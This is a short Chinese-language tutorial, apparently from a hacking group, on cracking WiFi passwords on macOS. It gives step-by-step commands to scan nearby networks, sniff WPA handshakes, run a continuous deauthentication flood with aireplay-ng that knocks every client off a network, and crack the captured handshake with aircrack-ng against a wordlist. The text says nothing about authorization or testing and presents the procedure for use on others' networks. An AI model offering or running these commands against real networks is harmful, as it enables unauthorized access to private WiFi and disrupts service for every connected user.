WIFI 密码破解

[KoreanHackerTeam]

WIFI 密码破解​

1 原理​

通过发送断开连接的请求，使得所有连接了目标 WIFI 的设备全都断开连接，设备会重新连接，然后监听其中一个设备与 WIFI 建立连接时的握手包，其中包含了密码的密文，然后使用 aircrack-ng 进行离线破解。

2 步骤​

2.1 扫描附近 SSID​

1 2 3 4

执行命令获取附近 SSID sudo /System/Library/PrivateFrameworks/Apple80211.framework/Versions/A/Resources/airport -s 设置快捷键后变成： airport -s

2.2 抓握手包​

信息 mac 下需要先安装 aircrack-ng brew install aircrack-ng

1	airport en0 sniff 信道

等待一段时间后，CTRL+C 结束监听

检测这个包里是否抓到里握手包（是否包含密码信息）：

1	sudo aircrack-ng /tmp/airportSniffTRT4xj.cap

注：因为同一个信道可能并不止一个 WIFI 信号在使用，所以会探测多个 WIFI

2.3 DeAuth 泛洪攻击​

1 2	sudo aireplay-ng -0 0 -a WIFI物理地址 -c 用户设备物理地址 wlan0mon 参数 -0 3 表示发送3次，-0 0 表示持续发送。 不加 -c 参数表示断开所有客户端的连接

2.4 破解握手密码包​

1	sudo aircrack-ng /tmp/airportSniffTRT4xj.cap -w 字典路径